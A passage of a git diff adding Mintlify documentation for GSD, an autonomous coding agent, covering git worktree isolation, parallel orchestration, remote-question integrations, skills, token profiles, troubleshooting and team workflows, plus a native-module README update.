All execution happens inside the worktree. On completion, the worktree is squash-merged to main as one clean commit. The worktree and branch are cleaned up. + +### `branch` mode + +Work happens in the project root on a `milestone/` branch. No worktree is created. On completion, the branch is merged to main. + + +**Changed in v2.45.0:** The default isolation mode changed from `worktree` to `none`. If your workflow relies on worktree isolation, set `git.isolation: worktree` explicitly in your preferences. + + +## Branching model + +``` +main ───────────────────────────────────────────────────────── + │ ↑ + └── milestone/M001 (worktree) ────────────────────────┘ + commit: feat: core types + commit: feat: markdown parser + commit: feat: file writer + → squash-merged to main as single commit +``` + +### Parallel worktrees + +With [parallel orchestration](/guides/parallel-orchestration) enabled, multiple milestones run in separate worktrees simultaneously: + +``` +main ────────────────────────────────────────────────────────── + │ ↑ ↑ + ├── milestone/M002 (worktree) ─────────┘ │ + │ → squash-merged first │ + │ │ + └── milestone/M003 (worktree) ────────────────────────┘ + → squash-merged second +``` + +Merges happen sequentially to avoid conflicts. + +### Commit format + +Conventional commit format with GSD metadata in trailers: + +``` +feat: core type definitions + +GSD-Task: M001/S01/T01 + +feat: markdown parser for plan files + +GSD-Task: M001/S01/T02 +``` + +## Workflow modes + +Set `mode` to get sensible defaults: + +```yaml +mode: solo # personal projects +mode: team # shared repos +``` + +| Setting | `solo` | `team` | +|---|---|---| +| `git.auto_push` | `true` | `false` | +| `git.push_branches` | `false` | `true` | +| `git.pre_merge_check` | `false` | `true` | +| `git.merge_strategy` | `"squash"` | `"squash"` | +| `unique_milestone_ids` | `false` | `true` | + +Mode defaults are the lowest priority — any explicit preference overrides them. 
+ +## Git preferences + +```yaml +git: + auto_push: false + push_branches: false + remote: origin + snapshots: false + pre_merge_check: false + commit_type: feat + main_branch: main + merge_strategy: squash # "squash" or "merge" + isolation: none # "none" (default), "worktree", or "branch" + commit_docs: true + auto_pr: false + pr_target_branch: develop +``` + +### Automatic pull requests + +For teams using Gitflow or branch-based workflows: + +```yaml +git: + auto_push: true + auto_pr: true + pr_target_branch: develop +``` + +Pushes the milestone branch and creates a PR targeting your specified branch. Requires `gh` CLI installed and authenticated. + +### `commit_docs: false` + +Adds `.gsd/` to `.gitignore` and keeps all planning artifacts local-only. Useful for teams where only some members use GSD. + +## Worktree management + +### Automatic (auto mode) + +1. Milestone starts → worktree created at `.gsd/worktrees//` +2. Planning artifacts copied into the worktree +3. All execution happens inside the worktree +4. Milestone completes → squash-merged to main +5. Worktree and branch cleaned up + +### Manual + +``` +/worktree create +/worktree switch +/worktree merge +/worktree remove +``` + +## Self-healing + +GSD includes automatic recovery for common git issues: + +- **Detached HEAD** — automatically reattaches to the correct branch +- **Stale lock files** — removes `index.lock` files from crashed processes +- **Orphaned worktrees** — detects and offers cleanup + +Run `/gsd doctor` to check git health manually. diff --git a/mintlify-docs/guides/migration.mdx b/mintlify-docs/guides/migration.mdx new file mode 100644 index 000000000..8f4646d79 --- /dev/null +++ b/mintlify-docs/guides/migration.mdx @@ -0,0 +1,47 @@ +--- +title: "Migration from v1" +description: "Migrate .planning directories from the original GSD to GSD-2's .gsd format." 
+--- + +If you have projects with `.planning` directories from the original Get Shit Done (v1), you can migrate them to GSD-2's `.gsd` format. + +## Running the migration + +```bash +# From within the project directory +/gsd migrate + +# Or specify a path +/gsd migrate ~/projects/my-old-project +``` + +## What gets migrated + +The migration tool: + +- Parses `PROJECT.md`, `ROADMAP.md`, `REQUIREMENTS.md`, phase directories, plans, summaries, and research +- Maps phases → slices, plans → tasks, milestones → milestones +- Preserves completion state (`[x]` phases stay done, summaries carry over) +- Consolidates research files +- Shows a preview before writing anything +- Optionally runs an agent-driven review of the output + +## Supported formats + +The migration handles various v1 format variations: + +- Milestone-sectioned roadmaps with `
` blocks +- Bold phase entries +- Bullet-format requirements +- Decimal phase numbering +- Duplicate phase numbers across milestones + +## Post-migration + +Verify the output: + +``` +/gsd doctor +``` + +This checks `.gsd/` integrity and flags any structural issues. diff --git a/mintlify-docs/guides/parallel-orchestration.mdx b/mintlify-docs/guides/parallel-orchestration.mdx new file mode 100644 index 000000000..830f0d10e --- /dev/null +++ b/mintlify-docs/guides/parallel-orchestration.mdx @@ -0,0 +1,123 @@ +--- +title: "Parallel orchestration" +description: "Run multiple milestones simultaneously in isolated git worktrees." +--- + +Run multiple milestones simultaneously. Each gets its own worker process, branch, and context window — while a coordinator tracks progress, enforces budgets, and keeps everything in sync. + + +Parallel mode is behind `parallel.enabled: false` by default. Opt-in only. + + +## Quick start + +1. Enable in preferences: + +```yaml +parallel: + enabled: true + max_workers: 2 +``` + +2. Start parallel execution: + +``` +/gsd parallel start +``` + +3. Monitor progress: + +``` +/gsd parallel status +``` + +## Architecture + +``` +┌─────────────────────────────────────────────────────┐ +│ Coordinator (your GSD session) │ +│ │ +│ ┌──────────┐ ┌──────────┐ ┌──────────┐ │ +│ │ Worker 1 │ │ Worker 2 │ │ Worker 3 │ ... 
│ +│ │ M001 │ │ M003 │ │ M005 │ │ +│ └──────────┘ └──────────┘ └──────────┘ │ +│ │ │ │ │ +│ ▼ ▼ ▼ │ +│ .gsd/worktrees/ .gsd/worktrees/ .gsd/worktrees/ │ +└─────────────────────────────────────────────────────┘ +``` + +### Worker isolation + +| Resource | Isolation method | +|----------|-----------------| +| Filesystem | Git worktree — separate checkout | +| Git branch | `milestone/` per milestone | +| State | `GSD_MILESTONE_LOCK` — each worker sees only its milestone | +| Context | Separate process with its own agent sessions | +| Metrics | Each worktree has its own `metrics.json` | + +## Eligibility analysis + +Before starting, GSD checks which milestones can run concurrently: + +1. **Not complete** — finished milestones are skipped +2. **Dependencies satisfied** — all `dependsOn` entries must be complete +3. **File overlap check** — shared files get a warning (not a blocker) + +## Configuration + +```yaml +parallel: + enabled: false + max_workers: 2 + budget_ceiling: 50.00 + merge_strategy: "per-milestone" # or "per-slice" + auto_merge: "confirm" # "auto", "confirm", or "manual" +``` + +| Key | Default | Description | +|-----|---------|-------------| +| `enabled` | `false` | Master toggle | +| `max_workers` | `2` | Concurrent workers (1-4) | +| `budget_ceiling` | none | Aggregate cost limit across all workers | +| `merge_strategy` | `"per-milestone"` | When to merge back to main | +| `auto_merge` | `"confirm"` | How merge-back is handled | + +## Commands + +| Command | Description | +|---------|-------------| +| `/gsd parallel start` | Analyze, confirm, and start workers | +| `/gsd parallel status` | Show workers with state, progress, cost | +| `/gsd parallel stop [MID]` | Stop all or a specific worker | +| `/gsd parallel pause [MID]` | Pause all or a specific worker | +| `/gsd parallel resume [MID]` | Resume paused workers | +| `/gsd parallel merge [MID]` | Merge completed milestones to main | + +## Merge reconciliation + +- `.gsd/` state files — auto-resolved 
(accept milestone branch version) +- Code conflicts — merge halts, shows conflicting files. Resolve manually and retry. + +## Budget management + +When `budget_ceiling` is set, aggregate cost is tracked across all workers. Ceiling reached → coordinator signals workers to stop. + +## Troubleshooting + +### "No milestones are eligible" + +All milestones are complete or blocked by dependencies. Check `/gsd queue`. + +### Worker crashed + +Workers persist state to disk. On restart, the coordinator detects dead PIDs. Run `/gsd doctor --fix` to clean up, then `/gsd parallel start` to spawn new workers. + +### Merge conflicts + +``` +/gsd parallel merge # see which milestones conflict +# resolve in .gsd/worktrees// +/gsd parallel merge MID # retry +``` diff --git a/mintlify-docs/guides/remote-questions.mdx b/mintlify-docs/guides/remote-questions.mdx new file mode 100644 index 000000000..a21ac9ea8 --- /dev/null +++ b/mintlify-docs/guides/remote-questions.mdx @@ -0,0 +1,84 @@ +--- +title: "Remote questions" +description: "Discord, Slack, and Telegram integration for headless auto-mode." +--- + +Remote questions allow GSD to ask for user input via Slack, Discord, or Telegram when running in headless auto-mode. When GSD encounters a decision point, it posts the question to your configured channel and polls for a response. + +## Setup + + + + ``` + /gsd remote discord + ``` + + The setup wizard validates your bot token, picks a server and channel, sends a test message, and saves the config. + + **Bot requirements:** + - A Discord bot token from the [Developer Portal](https://discord.com/developers/applications) + - Permissions: Send Messages, Read Message History, Add Reactions, View Channel + + + ``` + /gsd remote slack + ``` + + The setup wizard validates your bot token, picks a channel, sends a test message, and saves the config. 
+ + **Bot requirements:** + - A Slack bot token (`xoxb-...`) from [Slack API](https://api.slack.com/apps) + - Scopes: `chat:write`, `reactions:read`, `reactions:write`, `channels:read`, `groups:read`, `channels:history`, `groups:history` + + + ``` + /gsd remote telegram + ``` + + The setup wizard validates your bot token, prompts for a chat ID, sends a test message, and saves the config. + + **Bot requirements:** + - A bot token from [@BotFather](https://t.me/BotFather) + - Bot must be added to the target group chat + + + +## Configuration + +```yaml +remote_questions: + channel: discord + channel_id: "1234567890123456789" + timeout_minutes: 5 + poll_interval_seconds: 5 +``` + +## How it works + +1. GSD encounters a decision point during auto-mode +2. The question is posted to your channel as a rich embed (Discord) or Block Kit message (Slack) +3. GSD polls for a response at the configured interval +4. You respond by reacting with a number emoji or replying with text +5. GSD picks up the response and continues +6. A check reaction confirms receipt + +### Response formats + +**Single question:** React with a number emoji (1️⃣-5️⃣) or reply with a number. + +**Multiple questions:** Reply with semicolons (`1;2;custom text`) or one answer per line. + +### Timeouts + +If no response within `timeout_minutes`, the LLM makes a conservative default choice or pauses auto-mode. 
+ +## Commands + +| Command | Description | +|---------|-------------| +| `/gsd remote` | Show menu and current status | +| `/gsd remote slack` | Set up Slack | +| `/gsd remote discord` | Set up Discord | +| `/gsd remote telegram` | Set up Telegram | +| `/gsd remote status` | Show current config and last prompt status | +| `/gsd remote disconnect` | Remove configuration | diff --git a/mintlify-docs/guides/skills.mdx b/mintlify-docs/guides/skills.mdx new file mode 100644 index 000000000..66a05b096 --- /dev/null +++ b/mintlify-docs/guides/skills.mdx @@ -0,0 +1,97 @@ +--- +title: "Skills" +description: "Specialized instruction sets that provide domain-specific guidance to the LLM." +--- + +Skills are specialized instruction sets that GSD loads when the task matches. They provide domain-specific guidance — coding patterns, framework idioms, testing strategies, and tool usage. + +## Bundled skills + +GSD ships with these skills, installed to `~/.gsd/agent/skills/`: + +| Skill | Trigger | Description | +|-------|---------|-------------| +| `frontend-design` | Web UI work | Production-grade frontend with high design quality | +| `swiftui` | macOS/iOS apps | Full lifecycle from creation to shipping | +| `debug-like-expert` | Complex debugging | Methodical investigation with evidence gathering | +| `rust-core` | Rust code | Idiomatic, safe, performant Rust patterns | +| `axum-web-framework` | Axum web apps | Complete Axum development guide | +| `tauri` | Tauri v2 desktop apps | Cross-platform desktop development | +| `github-workflows` | GitHub Actions | CI/CD, workflow debugging | +| `security-audit` | Security auditing | Dependency scanning, OWASP | +| `review` | Code review | Diff-aware quality analysis | +| `test` | Test generation | Auto-detects frameworks | +| `lint` | Linting and formatting | ESLint, Biome, Prettier | + +## Skill discovery + +The `skill_discovery` preference controls how GSD finds skills: + +| Mode | Behavior | +|------|----------| +| `auto` | Skills 
found and applied automatically | +| `suggest` | Skills identified but require confirmation (default) | +| `off` | No skill discovery | + +## Skill preferences + +```yaml +always_use_skills: + - debug-like-expert +prefer_skills: + - frontend-design +avoid_skills: + - security-docker +skill_rules: + - when: task involves Clerk authentication + use: [clerk] + - when: frontend styling work + prefer: [frontend-design] +``` + +### Resolution order + +1. **Bare name** — e.g., `frontend-design` → scans `~/.gsd/agent/skills/` and project skills +2. **Absolute path** — e.g., `/Users/you/.gsd/agent/skills/my-skill/SKILL.md` +3. **Directory path** — looks for `SKILL.md` inside + +User skills take precedence over project skills. + +## Custom skills + +Create a directory with a `SKILL.md` file: + +``` +~/.gsd/agent/skills/my-skill/ + SKILL.md — instructions for the LLM + references/ — optional reference files +``` + +### Project-local skills + +``` +.gsd/agent/skills/my-project-skill/ + SKILL.md +``` + +## Skill health dashboard + +``` +/gsd skill-health # overview table +/gsd skill-health rust-core # detailed view +/gsd skill-health --stale 30 # unused for 30+ days +/gsd skill-health --declining # falling success rates +``` + +The dashboard flags: +- Success rate below 70% over the last 10 uses +- Token usage rising 20%+ +- Skills unused beyond the staleness threshold + +### Staleness detection + +```yaml +skill_staleness_days: 60 # default: 60, set 0 to disable +``` + +Stale skills are excluded from automatic matching but remain invokable explicitly. diff --git a/mintlify-docs/guides/token-optimization.mdx b/mintlify-docs/guides/token-optimization.mdx new file mode 100644 index 000000000..ae79bf525 --- /dev/null +++ b/mintlify-docs/guides/token-optimization.mdx @@ -0,0 +1,175 @@ +--- +title: "Token optimization" +description: "Token profiles, context compression, and complexity-based task routing to reduce costs by 40-60%." 
+--- + +GSD's token optimization system has three pillars: **token profiles**, **context compression**, and **complexity-based task routing**. + +## Token profiles + +A token profile coordinates model selection, phase skipping, and context compression. Set it in preferences: + +```yaml +token_profile: balanced +``` + +### `budget` — maximum savings (40-60% reduction) + +| Dimension | Setting | +|-----------|---------| +| Planning model | Sonnet | +| Execution model | Sonnet | +| Simple task model | Haiku | +| Completion model | Haiku | +| Milestone research | Skipped | +| Slice research | Skipped | +| Reassessment | Skipped | +| Context level | Minimal | + +Best for: prototyping, small projects, well-understood codebases. + +### `balanced` — smart defaults + +| Dimension | Setting | +|-----------|---------| +| All models | User's default | +| Subagent model | Sonnet | +| Milestone research | Runs | +| Slice research | Skipped | +| Reassessment | Runs | +| Context level | Standard | + +Best for: most projects, day-to-day development. + +### `quality` — full context + +Every phase runs. Every context artifact is inlined. No shortcuts. Best for: complex architectures, greenfield projects, critical production work. + +## Context compression + +Each profile maps to an **inline level** controlling how much context is pre-loaded into dispatch prompts: + +| Profile | Level | What's included | +|---------|-------|-----------------| +| `budget` | Minimal | Task plan, essential prior summaries (truncated). Drops decisions, requirements, templates. | +| `balanced` | Standard | Task plan, prior summaries, slice plan, roadmap excerpt. | +| `quality` | Full | Everything — all plans, summaries, decisions, requirements, templates. 
| + +### Prompt compression + +GSD can apply deterministic text compression before falling back to section-boundary truncation: + +```yaml +compression_strategy: compress # or "truncate" +``` + +| Strategy | Behavior | Default for | +|----------|----------|------------| +| `truncate` | Drop entire sections at boundaries | `quality` | +| `compress` | Heuristic text compression first, then truncate | `budget`, `balanced` | + +### Context selection + +```yaml +context_selection: smart # or "full" +``` + +| Mode | Behavior | Default for | +|------|----------|------------| +| `full` | Inline entire files | `balanced`, `quality` | +| `smart` | TF-IDF semantic chunking for large files | `budget` | + +## Complexity-based task routing + +GSD classifies each task by complexity and routes it to an appropriate model tier. + + +Dynamic routing requires explicit `models` in your preferences. Without a `models` section, routing is skipped. + + +### Classification signals + +| Signal | Simple | Standard | Complex | +|--------|--------|----------|---------| +| Step count | ≤ 3 | 4-7 | ≥ 8 | +| File count | ≤ 3 | 4-7 | ≥ 8 | +| Description length | < 500 chars | 500-2000 | > 2000 chars | +| Code blocks | — | — | ≥ 5 | +| Complexity keywords | None | Any present | — | + +**Complexity keywords:** `research`, `investigate`, `refactor`, `migrate`, `integrate`, `complex`, `architect`, `redesign`, `security`, `performance`, `concurrent`, `parallel` + +### Budget pressure + +When approaching the budget ceiling, the classifier automatically downgrades tiers: + +| Budget used | Effect | +|------------|--------| +| < 50% | No adjustment | +| 50-75% | Standard → Light | +| 75-90% | More aggressive | +| > 90% | Everything except Heavy → Light | + +## Adaptive learning + +GSD tracks success/failure per tier and adjusts classifications over time. 
User feedback via `/gsd rate` is weighted 2x: + +``` +/gsd rate over # model was overpowered +/gsd rate ok # appropriate +/gsd rate under # too weak +``` + +## Configuration examples + + + + ```yaml + --- + version: 1 + token_profile: budget + budget_ceiling: 25.00 + models: + execution_simple: claude-haiku-4-5-20250414 + --- + ``` + + + ```yaml + --- + version: 1 + token_profile: balanced + models: + planning: + model: claude-opus-4-6 + fallbacks: + - openrouter/z-ai/glm-5 + execution: claude-sonnet-4-6 + --- + ``` + + + ```yaml + --- + version: 1 + token_profile: quality + models: + planning: claude-opus-4-6 + execution: claude-opus-4-6 + --- + ``` + + + +Per-phase overrides always win over profile defaults: + +```yaml +--- +version: 1 +token_profile: budget +phases: + skip_research: false # keep research despite budget profile +models: + planning: claude-opus-4-6 # use Opus for planning despite budget +--- +``` diff --git a/mintlify-docs/guides/troubleshooting.mdx b/mintlify-docs/guides/troubleshooting.mdx new file mode 100644 index 000000000..a95cd8557 --- /dev/null +++ b/mintlify-docs/guides/troubleshooting.mdx @@ -0,0 +1,158 @@ +--- +title: "Troubleshooting" +description: "Common issues, /gsd doctor, /gsd forensics, and recovery procedures." +--- + +## `/gsd doctor` + +The built-in diagnostic tool validates `.gsd/` integrity: + +``` +/gsd doctor +``` + +It checks file structure, referential integrity, completion state consistency, git worktree health, and stale lock files. + +## Common issues + + + + **Cause:** Stale cache after a crash, or the LLM didn't produce the expected artifact. + + **Fix:** Run `/gsd doctor` to repair state, then `/gsd auto`. + + + + **Cause:** A unit failed to produce its expected artifact twice in a row. + + **Fix:** Check the task plan for clarity. Refine it manually, then `/gsd auto`. + + + + **Cause:** npm's global bin directory isn't in `$PATH`. 
+ + **Fix:** + ```bash + npm prefix -g + echo 'export PATH="$(npm prefix -g)/bin:$PATH"' >> ~/.zshrc + source ~/.zshrc + ``` + + **Workaround:** `npx gsd-pi` or `$(npm prefix -g)/bin/gsd` + + + + | Error type | Auto-resume? | Delay | + |-----------|-------------|-------| + | Rate limit (429) | Yes | retry-after or 60s | + | Server error (500, 502, 503) | Yes | 30s | + | Auth/billing | No | Manual resume | + + For transient errors, configure fallback models: + ```yaml + models: + execution: + model: claude-sonnet-4-6 + fallbacks: + - openrouter/minimax/minimax-m2.5 + ``` + + + + Increase `budget_ceiling` in preferences, or switch to `budget` token profile. Resume with `/gsd auto`. + + + + GSD auto-detects stale locks. If automatic recovery fails: + ```bash + rm -f .gsd/auto.lock + rm -rf "$(dirname .gsd)/.gsd.lock" + ``` + + + + GSD auto-resolves conflicts on `.gsd/` runtime files. For code conflicts, the LLM attempts resolution. If that fails, resolve manually. + + + + **Cause:** Antivirus, indexers, or editors briefly locking files during atomic rename. + + **Fix:** Re-run the operation. Close tools holding files open if the error persists. Run `/gsd doctor` to verify repo health. + + + + **Cause:** The default `git.isolation` mode changed from `worktree` to `none` in v2.45.0. + + **Fix:** Set `git.isolation: worktree` explicitly in your preferences: + ```yaml + git: + isolation: worktree + ``` + + + + **Cause:** GSD v2.45+ checks for Node.js >= 22 and git availability at startup. + + **Fix:** Install Node.js 22+ (24 LTS recommended) and ensure `git` is in your PATH. + + + +## `/gsd forensics` + +Full-access debugger for post-mortem analysis: + +``` +/gsd forensics [optional problem description] +``` + +Provides anomaly detection, unit traces, metrics analysis, doctor integration, and LLM-guided investigation. + +## MCP client issues + +Use `/gsd mcp` to check MCP server status and connectivity at a glance. 
+ + + + Verify `.mcp.json` or `.gsd/mcp.json` exists and parses as valid JSON. + + + + Run the configured command outside GSD to confirm the server starts. Check backend URLs and dependencies. + + + + Use absolute paths. Set required environment variables in the MCP config's `env` block. + + + +## Recovery procedures + +### Reset auto mode state + +```bash +rm .gsd/auto.lock +rm .gsd/completed-units.json +``` + +Then `/gsd auto` to restart from current disk state. + +### Reset routing history + +```bash +rm .gsd/routing-history.json +``` + +### Full state rebuild + +``` +/gsd doctor +``` + +Rebuilds `STATE.md` from plan and roadmap files on disk. + +## Getting help + +- **GitHub Issues:** [github.com/gsd-build/GSD-2/issues](https://github.com/gsd-build/gsd-2/issues) +- **Dashboard:** `Ctrl+Alt+G` or `/gsd status` +- **Forensics:** `/gsd forensics` +- **Session logs:** `.gsd/activity/` diff --git a/mintlify-docs/guides/visualizer.mdx b/mintlify-docs/guides/visualizer.mdx new file mode 100644 index 000000000..5ea199621 --- /dev/null +++ b/mintlify-docs/guides/visualizer.mdx @@ -0,0 +1,82 @@ +--- +title: "Workflow visualizer" +description: "Interactive TUI overlay for progress, dependencies, metrics, and timeline." +--- + +The workflow visualizer is a full-screen TUI overlay with four tabs showing project progress, dependencies, cost metrics, and execution timeline. + +## Opening + +``` +/gsd visualize +``` + +Or configure automatic display after milestone completion: + +```yaml +auto_visualize: true +``` + +## Tabs + +Switch tabs with `Tab`, `1`-`4`, or arrow keys. + +### 1. Progress + +A tree view of milestones, slices, and tasks with completion status: + +``` +M001: User Management 3/6 tasks ⏳ + ✅ S01: Auth module 3/3 tasks + ✅ T01: Core types + ✅ T02: JWT middleware + ✅ T03: Login flow + ⏳ S02: User dashboard 1/2 tasks + ✅ T01: Layout component + ⬜ T02: Profile page +``` + +### 2. 
Dependencies + +ASCII dependency graph showing slice relationships: + +``` +S01 ──→ S02 ──→ S04 + └───→ S03 ──↗ +``` + +### 3. Metrics + +Bar charts showing cost and token usage by phase, slice, and model. + +### 4. Timeline + +Chronological execution history with unit type, timestamps, duration, model, and token counts. + +## Controls + +| Key | Action | +|-----|--------| +| `Tab` | Next tab | +| `Shift+Tab` | Previous tab | +| `1`-`4` | Jump to tab | +| `↑`/`↓` | Scroll | +| `Escape` / `q` | Close | + +The visualizer refreshes from disk every 2 seconds, staying current alongside a running auto-mode session. + +## HTML export + +For shareable reports outside the terminal: + +``` +/gsd export --html +``` + +Generates a self-contained HTML file in `.gsd/reports/` with progress tree, dependency graph (SVG), cost/token charts, execution timeline, and changelog. All CSS and JS are inlined — printable to PDF from any browser. + +```yaml +auto_report: true # auto-generate after milestone completion (default) +``` + +An auto-generated `index.html` shows all reports with progression metrics across milestones. diff --git a/mintlify-docs/guides/web-interface.mdx b/mintlify-docs/guides/web-interface.mdx new file mode 100644 index 000000000..75f769c86 --- /dev/null +++ b/mintlify-docs/guides/web-interface.mdx @@ -0,0 +1,38 @@ +--- +title: "Web interface" +description: "Browser-based project management with real-time progress and multi-project support." +--- + +GSD includes a browser-based web interface for project management, real-time progress monitoring, and multi-project support. 
+ +## Quick start + +```bash +gsd --web +``` + +### CLI flags + +```bash +gsd --web --host 0.0.0.0 --port 8080 --allowed-origins "https://example.com" +``` + +| Flag | Default | Description | +|------|---------|-------------| +| `--host` | `localhost` | Bind address | +| `--port` | `3000` | Port | +| `--allowed-origins` | (none) | Comma-separated CORS origins | + +## Features + +- **Project management** — view milestones, slices, and tasks in a visual dashboard +- **Real-time progress** — server-sent events push status updates during auto-mode +- **Multi-project support** — manage multiple projects from a single tab via `?project=` URL parameter +- **Change project root** — switch directories from the web UI without restarting +- **Onboarding flow** — API key setup and provider configuration through the browser +- **Model selection** — switch models and providers from the web UI + +## Platform notes + +- **macOS/Linux** — full support +- **Windows** — web build is skipped due to Next.js webpack issues. The CLI remains fully functional. diff --git a/mintlify-docs/guides/working-in-teams.mdx b/mintlify-docs/guides/working-in-teams.mdx new file mode 100644 index 000000000..72baa19e2 --- /dev/null +++ b/mintlify-docs/guides/working-in-teams.mdx @@ -0,0 +1,72 @@ +--- +title: "Working in teams" +description: "Multi-user workflows with unique milestone IDs, push branches, and shared planning artifacts." +--- + +GSD supports multi-user workflows where several developers work on the same repository concurrently. + +## Setup + +### 1. Set team mode + +```yaml +# .gsd/PREFERENCES.md (project-level, committed to git) +--- +version: 1 +mode: team +--- +``` + +This enables unique milestone IDs, push branches, and pre-merge checks in one setting. Override individual settings on top of `mode: team` as needed. + +### 2. 
Configure `.gitignore` + +Share planning artifacts while keeping runtime files local: + +```bash +# Runtime / ephemeral (per-developer) +.gsd/auto.lock +.gsd/completed-units.json +.gsd/STATE.md +.gsd/metrics.json +.gsd/activity/ +.gsd/runtime/ +.gsd/worktrees/ +.gsd/milestones/**/continue.md +.gsd/milestones/**/*-CONTINUE.md +``` + +**Shared** (committed): preferences, PROJECT.md, REQUIREMENTS.md, DECISIONS.md, milestones. + +**Local** (gitignored): lock files, metrics, state cache, worktrees, activity logs. + +### 3. Commit + +```bash +git add .gsd/PREFERENCES.md +git commit -m "chore: enable GSD team workflow" +``` + +## `commit_docs: false` + +For teams where only some members use GSD: + +```yaml +git: + commit_docs: false +``` + +Adds `.gsd/` to `.gitignore` entirely. The developer gets structured planning without affecting teammates. + +## Parallel development + +Multiple developers run auto mode simultaneously on different milestones. Each developer gets their own worktree and unique `milestone/` branch. Milestone dependencies can be declared: + +```yaml +# M00X-CONTEXT.md frontmatter +--- +depends_on: [M001-eh88as] +--- +``` + +GSD enforces that dependent milestones complete before starting downstream work. diff --git a/mintlify-docs/images/favicon.svg b/mintlify-docs/images/favicon.svg new file mode 100644 index 000000000..90071ea65 --- /dev/null +++ b/mintlify-docs/images/favicon.svg @@ -0,0 +1,68 @@ + + + + + + + + + + + + + + + + + + + + Terminal + + + + + ~ + $ + npx get-shit-done-cc + + + ██████╗ ███████╗██████╗ + ██╔════╝ ██╔════╝██╔══██╗ + ██║ ███╗███████╗██║ ██║ + ██║ ██║╚════██║██║ ██║ + ╚██████╔╝███████║██████╔╝ + ╚═════╝ ╚══════╝╚═════╝ + + + Get Shit Done v1.0.1 + A meta-prompting, context engineering and spec-driven + development system for Claude Code by TÂCHES. + + + Installed commands/gsd + Installed get-shit-done + + + Done! Run /gsd:help to get started. 
+ + + ~ + $ + + + diff --git a/mintlify-docs/images/logo.png b/mintlify-docs/images/logo.png new file mode 100644 index 000000000..b4584cc6a Binary files /dev/null and b/mintlify-docs/images/logo.png differ diff --git a/mintlify-docs/images/logo.svg b/mintlify-docs/images/logo.svg new file mode 100644 index 000000000..d9f61c16e --- /dev/null +++ b/mintlify-docs/images/logo.svg @@ -0,0 +1,17 @@ + + + + + + + + + + + + + + + diff --git a/mintlify-docs/introduction.mdx b/mintlify-docs/introduction.mdx new file mode 100644 index 000000000..ea30b2d5d --- /dev/null +++ b/mintlify-docs/introduction.mdx @@ -0,0 +1,101 @@ +--- +title: "GSD — Get Shit Done" +description: "An autonomous coding agent that researches, plans, executes, and commits code while you focus on what matters." +--- + +GSD is an autonomous coding agent. Describe what you want built, run `/gsd auto`, and walk away. Come back to working software with clean git history. + +## What GSD does + + + + A state machine reads your project state, dispatches work to an LLM in fresh context windows, and advances through research, planning, execution, and verification — all without manual intervention. + + + Every task produces a conventional commit. Milestones are squash-merged to main. Your `git log` reads like a changelog. + + + Budget ceilings, token profiles, and dynamic model routing keep costs in check. Use Haiku for simple tasks and Opus for architectural work — automatically. + + + Sessions recover from crashes, provider errors auto-retry, and headless mode auto-restarts with exponential backoff. Designed for overnight unattended execution. + + + +## How it works + +GSD organizes work into a hierarchy: + +``` +Milestone → a shippable version (4-10 slices) + Slice → one demoable vertical capability (1-7 tasks) + Task → one context-window-sized unit of work +``` + +The iron rule: **a task must fit in one context window.** If it can't, it's two tasks. 
+ +Auto mode loops through this hierarchy: + +``` +Plan → Execute (per task) → Complete → Reassess Roadmap → Next Slice + ↓ (all slices done) + Validate → Complete Milestone +``` + +Every phase gets a fresh context window with pre-loaded context — no accumulated garbage, no degraded quality. + +## Two ways to work + + + + Type `/gsd` inside a session. GSD executes one unit at a time, pausing between each so you can review. + + ```bash + gsd + /gsd + ``` + + + Type `/gsd auto` and walk away. GSD autonomously researches, plans, executes, verifies, and commits until the milestone is complete. + + ```bash + gsd + /gsd auto + ``` + + + +The recommended workflow: auto mode in one terminal, steering from another. + +**Terminal 1 — let it build:** + +```bash +gsd +/gsd auto +``` + +**Terminal 2 — steer while it works:** + +```bash +gsd +/gsd discuss # talk through architecture decisions +/gsd status # check progress +/gsd capture # fire-and-forget thoughts +``` + +## Next steps + + + + Get up and running in under a minute. + + + How the autonomous execution engine works. + + + Every command, shortcut, and CLI flag. + + + Models, budgets, timeouts, and preferences. + + diff --git a/native/README.md b/native/README.md index bf818e9d5..4f6829681 100644 --- a/native/README.md +++ b/native/README.md @@ -6,8 +6,11 @@ Rust N-API addon providing high-performance native modules for GSD. ``` JS (packages/native) -> N-API -> Rust crates - ├── engine/ (N-API bindings, cdylib) - └── grep/ (ripgrep internals, pure Rust lib) + +native/crates/ +├── engine/ (N-API bindings, cdylib — 20+ modules) +├── grep/ (ripgrep internals, pure Rust lib) +└── ast/ (ast-grep structural search) ``` Inspired by [Oh My Pi's pi-natives](https://github.com/can1357/oh-my-pi), adapted for GSD's Node.js runtime. 
@@ -15,7 +18,7 @@ Inspired by [Oh My Pi's pi-natives](https://github.com/can1357/oh-my-pi), adapte ## Prerequisites - **Rust** (stable, 1.70+): https://rustup.rs -- **Node.js** (20.6+) +- **Node.js** (22.0.0+) ## Build @@ -41,6 +44,34 @@ npm run test:native ## Modules +### ast + +Structural code search via ast-grep. Provides pattern-based code matching that understands language syntax, enabling searches like "find all functions that return a Promise" rather than raw regex. + +### clipboard + +Native clipboard access for reading and writing system clipboard contents. + +### diff + +Fuzzy text matching and unified diff generation. Provides efficient comparison of text content with configurable matching thresholds. + +### fd + +Fuzzy file path discovery. Locates files by partial name matching across the project tree. + +### fs_cache + +Filesystem caching layer. Caches file metadata and contents to reduce redundant I/O during repeated operations. + +### git + +Libgit2-backed git read operations. Provides fast, direct access to repository status, diffs, blame, and log without shelling out to the `git` CLI. + +### glob / glob_util + +Gitignore-aware file discovery. Walks directory trees while respecting `.gitignore` rules, returning matching paths for a given glob pattern. + ### grep Ripgrep-backed regex search using the `grep-regex`, `grep-searcher`, and `grep-matcher` crates. @@ -72,6 +103,54 @@ const contentResult = searchContent(Buffer.from(fileContent), { }); ``` +### gsd_parser + +GSD file parsing and frontmatter extraction. Reads `.gsd` files and extracts structured metadata from YAML frontmatter blocks. + +### highlight + +Syntect-based syntax highlighting. Tokenizes source code and produces highlighted output for terminal or HTML rendering. + +### html + +HTML-to-Markdown conversion. Transforms HTML content into clean Markdown, useful for importing web content into GSD notes and documents. + +### image + +Image decoding, encoding, and resizing. 
